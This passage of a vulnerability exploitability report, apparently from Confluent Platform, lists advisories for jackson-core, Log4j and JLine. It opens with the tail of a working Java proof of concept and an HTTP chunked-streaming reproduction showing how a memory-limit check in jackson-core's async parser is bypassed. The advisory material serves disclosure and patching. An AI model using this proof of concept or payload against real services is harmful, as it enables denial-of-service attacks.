(t != JsonToken.NOT_AVAILABLE) {\n                System.out.println(\"[-] unexpected token: \" + t);\n                return;\n            }\n        }\n        System.out.println(\"[+] BUG PRESENT: async parser accepted ~9.83 MB of digits with maxNumberLength=1000\");\n\n        // Closing the number now finally triggers the validator.\n        feeder.feedInput(\"}\".getBytes(\"UTF-8\"), 0, 1);\n        feeder.endOfInput();\n        try {\n            while (ap.nextToken() != null) { /* drive */ }\n        } catch (Exception e) {\n            System.out.println(\"[*] late rejection on close: \" + e.getMessage().split(\"\\n\")[0]);\n        }\n        ap.close();\n    }\n}\nEOF\njavac -cp jackson-core-2.18.6.jar PoC.java\njava -Xmx256m -cp jackson-core-2.18.6.jar:. PoC\n```\n\nObserved output against `jackson-core-2.18.6`:\n\n```\n[+] sync parser rejected 5000-digit int: StreamConstraintsException\n[+] BUG PRESENT: async parser accepted ~9.83 MB of digits with maxNumberLength=1000\n[*] late rejection on close: Number value length (9830400) exceeds the maximum allowed (1000, from `StreamReadConstraints.getMaxNumberLength()`)\n```\n\nObserved output against `jackson-core-2.21.1`: identical.\n\nThe 9.83 MB figure is purely a function of the loop bound (600 chunks * 16 KiB). The actual ceiling is `maxStringLength = 20 MiB`. With the strict policy declared as `maxNumberLength = 1000`, the parser permits **9830x** more allocation than the policy allows. With `maxStringLength` left at the default 20 MiB, an attacker can drive a single connection to 40 MiB of `char[]` heap (chars are 2 bytes each) before the validator finally fires on terminator/`endOfInput()`. Multiply by concurrent connections.\n\n## End-to-end reproduction through real HTTP\n\nSupplements the standalone PoC with a running Spring Boot WebFlux server,\ndriving the same bug through the actual reactor-netty + Jackson2JsonDecoder\nstreaming-decode path that production reactive endpoints use.\n\nSetup:\n- Spring Boot 3.3.5 starter-webflux (spring-webflux 6.1.14, reactor-netty 1.1.23)\n- jackson-databind 2.17.2, jackson-core overridden:\n  - VULN run: `com.fasterxml.jackson.core:jackson-core:2.18.7` (latest published)\n  - PATCHED run: `2.18.8-SNAPSHOT` built from the fix branch\n- JVM: OpenJDK 17.0.18\n- Server `JsonFactory` configured with `StreamReadConstraints.builder().maxNumberLength(1000).build()`\n\nEndpoint under test exposes the `Flux<DataBuffer>` request body directly to\n`Jackson2JsonDecoder.decode(Flux, ResolvableType, ...)` so the parser sees one\nHTTP chunk per `feedInput` (the same pattern used for any\n`@RequestBody Flux<...>` / streaming JSON decoder in WebFlux). A raw-socket\nHTTP/1.1 chunked client streams `{\"v\":1` then 250 chunks of 200 digit bytes\neach (50,000 digits total) at 20ms intervals, then writes the closing `}`.\n\nVULN \u2014 jackson-core 2.18.7:\n```\n[VULN-SMALLCHUNK] streamed 50000 digits across 250 chunks; server still accepting\n[VULN-SMALLCHUNK] full POST sent (50000 digits). Response:\nHTTP/1.1 200 OK\nERR after 6548ms cause=com.fasterxml.jackson.core.exc.StreamConstraintsException:\n       Number value length (50000) exceeds the maximum allowed (1000, ...)\n```\nServer-side controller trace (250 DataBuffer arrivals elided):\n```\n[ctrl] DataBuffer arrived size=6   ms=39       <- '{\"v\":1'\n[ctrl] DataBuffer arrived size=200 ms=42\n...\n[ctrl] DataBuffer arrived size=199 ms=5993\n[ctrl] DataBuffer arrived size=1   ms=6518     <- closing '}'\n[ctrl] ERR after 6548ms ... Number value length (50000) exceeds ...\n```\nServer held all 50,000 digit characters in `_textBuffer` for 6.5 seconds with\n`maxNumberLength=1000` declared. The validator never fires during streaming;\nit only fires at value-completion when the closing `}` arrives.\n\nPATCHED \u2014 jackson-core 2.18.8-SNAPSHOT (fix branch):\n```\n[PATCHED-SMALLCHUNK] connection broke after 2801 digits at chunk 14: [Errno 32] Broken pipe\n[PATCHED-SMALLCHUNK] DONE: digits_sent=2801 status=connection-broke-mid-stream\n```\nServer-side controller trace:\n```\n[ctrl] DataBuffer arrived size=6   ms=129\n[ctrl] DataBuffer arrived size=200 ms=142\n[ctrl] DataBuffer arrived size=200 ms=142\n[ctrl] DataBuffer arrived size=200 ms=145\n[ctrl] DataBuffer arrived size=200 ms=146\n[ctrl] DataBuffer arrived size=200 ms=147\n[ctrl] ERR after 155ms ... Number value length (1001) exceeds the maximum allowed (1000, ...)\n```\nPatched server raises `StreamConstraintsException` at 155ms after only 5\nDataBuffers, exactly when the accumulated digit count crosses\n`maxNumberLength=1000`. The connection is reset mid-stream rather than the\nparser silently consuming the rest of the attacker's payload.\n\nSide-by-side:\n\n| Build | Chunks accepted before exception | Digits buffered | Time to detection |\n|---|---|---|---|\n| jackson-core 2.18.7 | 250 (full payload) | 50,000 (50x the configured limit) | 6,548ms \u2014 only at terminator |\n| 2.18.8-SNAPSHOT (fix branch) | 5 | 1,001 | 155ms \u2014 moment threshold crossed |\n\nNote on the default `@RequestBody Mono<JsonNode>` path: that path cannot\ndistinguish the two builds because Spring's `decodeToMono` joins all\nDataBuffers into one before parsing. The exploitable shape is the\nstreaming-decode path (`Flux<JsonNode>` / `@RequestBody Flux<...>` /\nWebSocket / SSE / any direct `decoder.decode(Flux<DataBuffer>, ...)` call),\nwhich is also what `Jackson2Tokenizer` uses for any streaming JSON\ndeserialization in WebFlux and Quarkus reactive REST.\n\n## Suggested fix\n\nMirror the pattern already used in `_finishFloatFraction`. At every site that returns `_updateTokenToNA()` (or `JsonToken.NOT_AVAILABLE`) with `_minorState = MINOR_NUMBER_INTEGER_DIGITS`, call `_setIntLength(outPtr + negMod)` first. Concretely, the diff to `NonBlockingUtf8JsonParserBase.java` would be:\n\n```diff\n     protected JsonToken _finishNumberIntegralPart(char[] outBuf, int outPtr) throws IOException {\n         int negMod = _numberNegative ? -1 : 0;\n\n         while (true) {\n             if (_inputPtr >= _inputEnd) {\n                 _minorState = MINOR_NUMBER_INTEGER_DIGITS;\n                 _textBuffer.setCurrentLength(outPtr);\n+                _streamReadConstraints.validateIntegerLength(outPtr + negMod);\n                 return _updateTokenToNA();\n             }\n```\n\nNote: `_setIntLength` itself can't be used as-is because it also assigns `_intLength`, and `_intLength` must not be set until the integer is truly complete (subsequent fraction handling reads `_intLength`). The minimal fix is to call only the validator, as shown.\n\nApply the same one-line insertion before each `return _updateTokenToNA();` that exits with `_minorState = MINOR_NUMBER_INTEGER_DIGITS`. The sites are listed above (12 lines total).\n\nAlternatively, a heavier refactor: also gate `_textBuffer.expandCurrentSegment()` calls inside the digit-accumulation loops on `outPtr < maxNumberLength` so that the validator fires at the moment the buffer would be enlarged past the limit, rather than waiting for the next chunk boundary. Either approach is sufficient.\n\n## Credit\n\nReported by `tonghuaroot` (`tonghuaroot@gmail.com`). Variant hunt against the Feb 2026 fix for GHSA-72hv-8253-57qq.",
      "recommendation": "Upgrade com.fasterxml.jackson.core:jackson-core to version 2.18.8, 2.21.4",
      "advisories": [
        {
          "url": "https://github.com/advisories/GHSA-r7wm-3cxj-wff9"
        },
        {
          "url": "https://github.com/FasterXML/jackson-core"
        },
        {
          "url": "https://github.com/FasterXML/jackson-core/commit/050b429804dce2a7e08f0be1b0b4c3d040fdb9cd"
        },
        {
          "url": "https://github.com/FasterXML/jackson-core/commit/4cdd529749da396cc7edf6d4a2aad41d47902641"
        },
        {
          "url": "https://github.com/FasterXML/jackson-core/commit/c5941e5aae7fd5aeac55d66933cfb82b9aabeef8"
        },
        {
          "url": "https://github.com/FasterXML/jackson-core/pull/1611"
        },
        {
          "url": "https://github.com/FasterXML/jackson-core/security/advisories/GHSA-r7wm-3cxj-wff9"
        }
      ],
      "published": "2026-07-21T21:58:53+00:00",
      "updated": "2026-08-03T20:30:41+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6",
          "versions": [
            {
              "version": "2.18.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:9b068e1a-8bb7-460d-a898-b38a7bd09e06/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:7f5b0f1f-2f04-4da8-a834-ed0e9a127639/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#5f7c635c-5ae4-486a-8b79-953e691c01fe"
        },
        {
          "ref": "urn:cdx:1c2d07e7-bc46-4c64-85c9-cf1f4b389599/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:1927755b-d423-4e30-8d32-4b9c1f7386ae/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:4c40e9d9-e7f5-4ca1-9f62-645e9d880727/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:ce29a600-32f9-4ae4-989e-52d9c75f55d4/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:653f91e3-86f8-4a44-b1b9-2f9103b70aa0/1#b9c9e664-9dbe-4234-aaa6-d06f06e6bcd5"
        },
        {
          "ref": "urn:cdx:82acba58-7e67-475b-bbb0-774b260bff77/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#f5612dfa-cec7-460e-b221-5be038906da4"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#65f20afc-cfbd-40cc-9a16-56f19842c6f0"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#953623c8-1c2d-45f9-97aa-60063307133f"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#f6066c00-6d54-44d5-9bee-849b560ece4f"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#fa150609-fcdf-4e89-ab0c-365753768097"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#fca260ec-a4f3-4809-9036-ba3afb0d7921"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#f30c41ef-cd50-433e-82c2-1532589fe73b"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#e3f9e795-9b5f-455b-91dc-0161b05a30d3"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#e502f38e-35f3-4cb4-b90d-7cd028af6afb"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#f90baa9b-6812-4029-a647-ff47b8f8ac4c"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#d75a4491-5745-47f7-94d5-b99f196666bf"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#b410c7d7-fd60-4f63-a3c3-8adcc9a64c61"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#d4f3aa23-bb2b-44fa-92e6-711cdf6aebf5"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#fb2f2d0d-a209-4ce2-ad49-953b52f2d83e"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. All CP REST APIs are built on blocking Jackson deserialization; the non-blocking async parser API this issue requires is never used anywhere in the CP repo set."
      }
    },
    {
      "id": "CVE-2026-49844",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        116
      ],
      "description": "Improper encoding of non-finite floating-point values during MapMessage JSON serialization in Apache Log4j API produces output that is not valid JSON. This issue affects Apache Log4j API versions 2.13.1 through 2.25.4 and version 2.26.0.\n\nThe fix for CVE-2026-34481 did not cover all code paths: when a MapMessage contains a non-finite IEEE 754 value (NaN, Infinity, or -Infinity), MapMessage.asJson() emits the corresponding bare token. RFC 8259 does not permit these tokens, so a conformant parser rejects the resulting document.\n\nThe defect is reachable only when both of the following conditions hold:\n\n  *  The application uses the  message resolver https://logging.apache.org/log4j/2.x/manual/json-template-layout.html#event-template-resolver-message  of JsonTemplateLayout or any other layout that relies on MapMessage.asJson() or MapMessage.getFormattedMessage(new String[]{\"JSON\"}).\n  *  The application logs a MapMessage that contains an attacker-controlled floating-point value.\n\n\nAn attacker who can supply a non-finite value can cause the affected layout to emit malformed JSON, which may corrupt the enclosing log record or disrupt downstream log ingestion and parsing.\n\nUsers are advised to upgrade to Apache Log4j API 2.25.5 or 2.26.1, both of which emit RFC 8259-compliant JSON for non-finite values.",
      "recommendation": "Upgrade org.apache.logging.log4j:log4j-api to version 2.25.5, 2.26.1",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-49844"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-49844"
        },
        {
          "url": "https://github.com/apache/logging-log4j2"
        },
        {
          "url": "https://github.com/apache/logging-log4j2/commit/19edb23e162d6c728a8c2221a240037d389ed300"
        },
        {
          "url": "https://github.com/apache/logging-log4j2/commit/feadf8eb0b4acb6ddfa4c0ab2bbc6d88b8e12d82"
        },
        {
          "url": "https://github.com/apache/logging-log4j2/pull/4163"
        },
        {
          "url": "https://github.com/apache/logging-log4j2/releases/tag/rel/2.25.5"
        },
        {
          "url": "https://github.com/apache/logging-log4j2/releases/tag/rel/2.26.1"
        },
        {
          "url": "https://logging.apache.org/cyclonedx/vdr.xml"
        },
        {
          "url": "https://logging.apache.org/log4j/2.x/manual/json-template-layout.html#event-template-resolver-message"
        },
        {
          "url": "https://logging.apache.org/security.html#CVE-2026-49844"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-49844"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-49844"
        }
      ],
      "published": "2026-07-10T22:16:42+00:00",
      "updated": "2026-07-14T20:03:09+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.apache.logging.log4j/log4j-api@2.25.4",
          "versions": [
            {
              "version": "2.25.4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:7f5b0f1f-2f04-4da8-a834-ed0e9a127639/1#pkg:maven/org.apache.logging.log4j/log4j-api@2.25.4"
        },
        {
          "ref": "urn:cdx:e02dd261-cd8f-4913-980a-9e4efbca1fa6/1#pkg:maven/org.apache.logging.log4j/log4j-api@2.25.4"
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#c733dd58-efe8-442e-8dcb-9d219d43a9f3"
        },
        {
          "ref": "urn:cdx:1c2d07e7-bc46-4c64-85c9-cf1f4b389599/1#pkg:maven/org.apache.logging.log4j/log4j-api@2.25.4"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/org.apache.logging.log4j/log4j-api@2.25.4"
        },
        {
          "ref": "urn:cdx:1927755b-d423-4e30-8d32-4b9c1f7386ae/1#pkg:maven/org.apache.logging.log4j/log4j-api@2.25.4"
        },
        {
          "ref": "urn:cdx:4c40e9d9-e7f5-4ca1-9f62-645e9d880727/1#pkg:maven/org.apache.logging.log4j/log4j-api@2.25.4"
        },
        {
          "ref": "urn:cdx:653f91e3-86f8-4a44-b1b9-2f9103b70aa0/1#pkg:maven/org.apache.logging.log4j/log4j-api@2.25.4"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#pkg:maven/org.apache.logging.log4j/log4j-api@2.25.4"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/org.apache.logging.log4j/log4j-api@2.25.4"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:maven/org.apache.logging.log4j/log4j-api@2.25.4"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:maven/org.apache.logging.log4j/log4j-api@2.25.4"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#bf065fa9-18fa-40b2-9da8-4619d9b882d3"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#f0cb8b48-7a07-4753-89b4-f96a676cb8ff"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#f15655ae-1a42-412e-a609-0e794e87ca8c"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#cc3f8851-4e4a-489a-9e00-624dd85ae355"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#e978a712-2618-4888-85e3-0603cadceb06"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#e1a26e6d-b2bb-45a8-8d4a-c37fdd3d83ce"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#f8a589b5-6ef4-416d-bfd0-656fbc1f107d"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#c235f91c-d6d5-4054-8050-7a7e1c7169b8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#d635fc32-c99a-4b09-bf59-e5334f12cc68"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#de33b829-7deb-4a88-bdb2-a44255938a9c"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#bc6fc474-093c-413f-9cd3-feace1907c65"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#6564d74b-acda-4e0b-b2b7-47f2d6af5d5f"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#cefec4ac-b81d-4aa9-931a-86f372fd6f4a"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#f1167fc3-a9f2-4439-8da1-ded9475a46b4"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-56740",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400
      ],
      "description": "JLine is a Java library for handling console input. Prior to 3.30.14, 4.0.16, and 4.2.1, the JLine3 Telnet server remote-telnet module does not limit the number of environment variables a client may inject via the Telnet NEW-ENVIRON option, and TelnetIO.readNEVariables() in TelnetIO.java:1127-1180 stores each variable pair in a HashMap held by ConnectionData, allowing an unauthenticated attacker to flood unique variable pairs before the terminating IAC SE byte and exhaust JVM heap memory with an OutOfMemoryError. This issue is fixed in versions 3.30.14, 4.0.16, and 4.2.1.",
      "recommendation": "Upgrade org.jline:jline-remote-telnet to version 4.2.1",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56740"
        },
        {
          "url": "https://github.com/jline/jline3"
        },
        {
          "url": "https://github.com/jline/jline3/commit/0389f0ee6d0375901b602671ad5dafd4d1d4ee09"
        },
        {
          "url": "https://github.com/jline/jline3/commit/4ee3a73849ffb9a85ec748e4e8cd8f6d81f84f40"
        },
        {
          "url": "https://github.com/jline/jline3/commit/934f09e6128cee33c2b13d42b6e859c1ee2d194b"
        },
        {
          "url": "https://github.com/jline/jline3/pull/2000"
        },
        {
          "url": "https://github.com/jline/jline3/pull/2001"
        },
        {
          "url": "https://github.com/jline/jline3/releases/tag/4.0.16"
        },
        {
          "url": "https://github.com/jline/jline3/releases/tag/4.2.1"
        },
        {
          "url": "https://github.com/jline/jline3/releases/tag/jline-3.30.14"
        },
        {
          "url": "https://github.com/jline/jline3/security/advisories/GHSA-47qp-hqvx-6r3f"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56740"
        }
      ],
      "published": "2026-07-17T22:17:57+00:00",
      "updated": "2026-08-18T15:23:04+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.jline/jline-remote-telnet@3.25.1",
          "versions": [
            {
              "version": "3.25.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.jline/jline-remote-telnet@3.25.0",
          "versions": [
            {
              "version": "3.25.0",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.jline/jline-remote-telnet@3.30.4",
          "versions": [
            {
              "version": "3.30.4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e02dd261-cd8f-4913-980a-9e4efbca1fa6/1#pkg:maven/org.jline/jline-remote-telnet@3.25.1"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/org.jline/jline-remote-telnet@3.25.0"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/org.jline/jline-remote-telnet@3.30.4"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/org.jline/jline-remote-telnet@3.25.0"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:maven/org.jline/jline-remote-telnet@3.25.1"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:maven/org.jline/jline-remote-telnet@3.25.1"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:maven/org.jline/jline-remote-telnet@3.25.1"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:maven/org.jline/jline-remote-telnet@3.30.4"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:maven/org.jline/jline-remote-telnet@3.30.4"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:maven/org.jline/jline-remote-telnet@3.30.4"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:maven/org.jline/jline-remote-telnet@3.30.4"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:maven/org.jline/jline-remote-telnet@3.30.4"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:maven/org.jline/jline-remote-telnet@3.25.1"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:maven/org.jline/jline-remote-telnet@3.25.0"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:maven/org.jline/jline-remote-telnet@3.25.0"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. No CP repository constructs or starts a JLine Telnet server anywhere, so the vulnerable NEW-ENVIRON variable-flooding sink in TelnetIO is never reachable."
      }
    },
    {
      "id": "CVE-2026-56741",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400
      ],
      "description": "JLine is a Java library for handling console input. Prior to 3.30.14, 4.0.16, and 4.2.1, the JLine3 Telnet server remote-telnet module does not apply an upper bound to terminal dimensions received via the Telnet NAWS option, and TelnetIO.handleNAWS() in TelnetIO.java:856-879 reads client-supplied width and height as 16-bit unsigned integers and passes values such as 65535x65535 to setTerminalGeometry(), allowing an unauthenticated remote attacker to repeatedly alternate values and trigger continuous expensive rendering work that causes CPU exhaustion and denial of service. This issue is fixed in versions 3.30.14, 4.0.16, and 4.2.1.",
      "recommendation": "Upgrade org.jline:jline-remote-telnet to version 4.2.1",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56741"
        },
        {
          "url": "https://github.com/jline/jline3"
        },
        {
          "url": "https://github.com/jline/jline3/commit/3ea9cad8699714dc072fade29d36be0d1e23d708"
        },
        {
          "url": "https://github.com/jline/jline3/commit/733eb353dca7b0ea0252e724445b6defa29c393e"
        },
        {
          "url": "https://github.com/jline/jline3/commit/86b7ba7801988aadb1a67555629522a71d603bd3"
        },
        {
          "url": "https://github.com/jline/jline3/pull/2000"
        },
        {
          "url": "https://github.com/jline/jline3/releases/tag/4.0.16"
        },
        {
          "url": "https://github.com/jline/jline3/releases/tag/4.2.1"
        },
        {
          "url": "https://github.com/jline/jline3/security/advisories/GHSA-2r2c-cx56-8933"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56741"
        }
      ],
      "published": "2026-07-17T22:17:57+00:00",
      "updated": "2026-08-18T15:17:51+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.jline/jline-remote-telnet@3.25.1",
          "versions": [
            {
              "version": "3.25.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.jline/jline-remote-telnet@3.25.0",
          "versions": [
            {
              "version": "3.25.0",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.jline/jline-remote-telnet@3.30.4",
          "versions": [
            {
              "version": "3.30.4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e02dd261-cd8f-4913-980a-9e4efbca1fa6/1#pkg:maven/org.jline/jline-remote-telnet@3.25.1"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/org.jline/jline-remote-telnet@3.25.0"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/org.jline/jline-remote-telnet@3.30.4"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/org.jline/jline-remote-telnet@3.25.0"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:maven/org.jline/jline-remote-telnet@3.25.1"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:maven/org.jline/jline-remote-telnet@3.25.1"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:maven/org.jline/jline-remote-telnet@3.25.1"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:maven/org.jline/jline-remote-telnet@3.30.4"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:maven/org.jline/jline-remote-telnet@3.30.4"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:maven/org.jline/jline-remote-telnet@3.30.4"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:maven/org.jline/jline-remote-telnet@3.30.4"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:maven/org.jline/jline-remote-telnet@3.30.4"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:maven/org.jline/jline-remote-telnet@3.25.1"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:maven/org.jline/jline-remote-telnet@3.25.0"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:maven/org.jline/jline-remote-telnet@3.25.0"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
